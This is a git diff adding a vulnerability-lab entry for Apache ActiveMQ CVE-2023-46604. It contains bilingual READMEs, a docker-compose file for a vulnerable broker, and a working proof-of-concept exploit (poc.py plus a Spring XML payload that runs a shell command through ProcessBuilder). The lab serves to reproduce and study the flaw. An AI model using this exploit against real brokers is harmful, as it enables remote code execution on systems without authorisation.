diff --git a/activemq/CVE-2023-46604/01.png b/activemq/CVE-2023-46604/01.png
new file mode 100644
index 0000000000..8c8e768447
Binary files /dev/null and b/activemq/CVE-2023-46604/01.png differ
diff --git a/activemq/CVE-2023-46604/README.md b/activemq/CVE-2023-46604/README.md
new file mode 100644
index 0000000000..3fd417eaa4
--- /dev/null
+++ b/activemq/CVE-2023-46604/README.md
@@ -0,0 +1,46 @@
+# Apache ActiveMQ (Version < 5.18.3) RCE （CVE-2023-46604）
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+## Environment setup
+
+Enter following commands to build and run the vulnerability environment:
+
+```
+docker compose up -d
+```
+
+The environment listens to port 61616 and port 8161, of which 61616 is the working port. In this vulnerability exploitation, we only need to use port 61616. When executing the vulnerability verification process, please first access port 8161 to confirm that the service has started successfully.
+
+Visit `http://your-ip:8161/` to see the web page, indicating that the environment has been successfully run.
+
+## Background brief
+
+Apache ActiveMQ has a remote code execution vulnerability. This vulnerability may allow remote attackers with network access privileges to execute arbitrary shell commands by manipulating the serialized class types in the OpenWire protocol, leading to the instantiation of any class on the classpath of the agent.
+
+| Default port | Default Condition                    |
+|--------------|--------------------------------------|
+| 8161 (web)   | Remote access requires configuration |
+| 61616 (tcp)  | Remote access allowed                |
+
+## Exploit
+
+You can quickly start an HTTP server in the folder where the poc.xml file is located using the Python3 http.server module
+
+```shell
+python3 -m http.server 6666
+```
+
+execute poc.py
+
+```shell
+python3 poc.py target port http://ip of http server/poc.xml
+```
+
+You can check inside the ActiveMQ container using the following command:
+
+docker exec cve-2023-46604-activemq-1 ls -l /tmp
+
+If you see the output showing that touch /tmp/activeMQ-RCE-success has been executed successfully, then the exploit has worked.
+
+![01.png](01.png)
\ No newline at end of file
diff --git a/activemq/CVE-2023-46604/README.zh-cn.md b/activemq/CVE-2023-46604/README.zh-cn.md
new file mode 100644
index 0000000000..c115a3ef7d
--- /dev/null
+++ b/activemq/CVE-2023-46604/README.zh-cn.md
@@ -0,0 +1,44 @@
+# Apache ActiveMQ (版本 < 5.18.3) RCE （CVE-2023-46604）
+
+## 环境搭建
+
+搭建及运行漏洞环境：
+
+```
+docker compose up -d
+```
+
+环境监听61616端口和8161端口，其中8161为web控制台端口，61616为工作端口。在本次漏洞利用中，我们只需要用到61616端口。执行漏洞验证过程时，请先访问8161端口，确认服务启动成功。
+
+访问`http://your-ip:8161/`看到web页面，说明环境已成功运行。
+
+## 背景简述
+
+Apache ActiveMQ存在远程代码执行漏洞。该漏洞可能允许具有网络访问权限的远程攻击者通过操纵OpenWire协议中的序列化类类型来运行任意shell命令，从而导致代理实例化类路径上的任何类。
+
+| 默认端口      | 默认条件      |
+|-----------|-----------|
+| 8161  web | 需配置才可远程访问 |
+| 61616 tcp | 远程访问      |
+
+## 漏洞复现
+
+在poc.xml的文件夹下启动http服务
+
+```shell
+python3 -m http.server 6666
+```
+
+执行poc.py
+
+```shell
+python3 poc.py target port http://启动http服务的ip/poc.xml
+```
+
+到activeMQ容器中进行查看：
+
+docker exec cve-2023-46604-activemq-1 ls -l /tmp
+
+可以看到touch /tmp/activeMQ-RCE-success成功被执行：
+
+![01.png](01.png)
diff --git a/activemq/CVE-2023-46604/docker-compose.yml b/activemq/CVE-2023-46604/docker-compose.yml
new file mode 100644
index 0000000000..22e9f9b269
--- /dev/null
+++ b/activemq/CVE-2023-46604/docker-compose.yml
@@ -0,0 +1,7 @@
+version: '2'
+services:
+ activemq:
+   image: vulhub/activemq:5.11.1-with-cron
+   ports:
+    - "61616:61616"
+    - "8161:8161"
\ No newline at end of file
diff --git a/activemq/CVE-2023-46604/poc.py b/activemq/CVE-2023-46604/poc.py
new file mode 100644
index 0000000000..fa453ec86f
--- /dev/null
+++ b/activemq/CVE-2023-46604/poc.py
@@ -0,0 +1,36 @@
+import io
+import socket
+import sys
+
+
+def main(ip, port, xml):
+    classname = "org.springframework.context.support.ClassPathXmlApplicationContext"
+    socket_obj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    socket_obj.connect((ip, port))
+
+    with socket_obj:
+        out = socket_obj.makefile('wb')
+        # out = io.BytesIO()  # 创建一个内存中的二进制流
+        out.write(int(32).to_bytes(4, 'big'))
+        out.write(bytes([31]))
+        out.write(int(1).to_bytes(4, 'big'))
+        out.write(bool(True).to_bytes(1, 'big'))
+        out.write(int(1).to_bytes(4, 'big'))
+        out.write(bool(True).to_bytes(1, 'big'))
+        out.write(bool(True).to_bytes(1, 'big'))
+        out.write(len(classname).to_bytes(2, 'big'))
+        out.write(classname.encode('utf-8'))
+        out.write(bool(True).to_bytes(1, 'big'))
+        out.write(len(xml).to_bytes(2, 'big'))
+        out.write(xml.encode('utf-8'))
+        # print(list(out.getvalue()))
+        out.flush()
+        out.close()
+
+
+if __name__ == "__main__":
+    if len(sys.argv) != 4:
+        print("Please specify the target and port and poc.xml: python3 poc.py 127.0.0.1 61616 "
+              "http://192.168.0.101:8888/poc.xml")
+        exit(-1)
+    main(sys.argv[1], int(sys.argv[2]), sys.argv[3])
diff --git a/activemq/CVE-2023-46604/poc.xml b/activemq/CVE-2023-46604/poc.xml
new file mode 100644
index 0000000000..60a7dbf2e0
--- /dev/null
+++ b/activemq/CVE-2023-46604/poc.xml
@@ -0,0 +1,14 @@
+<?xml version="1.0" encoding="UTF-8" ?>
+<beans xmlns="http://www.springframework.org/schema/beans"
+       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+       xsi:schemaLocation="http://www.springframework.org/schema/beans
+       http://www.springframework.org/schema/beans/spring-beans.xsd">
+    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
+        <constructor-arg>
+            <list>
+                <value>touch</value>
+                <value>/tmp/activeMQ-RCE-success</value>
+            </list>
+        </constructor-arg>
+    </bean>
+</beans>
\ No newline at end of file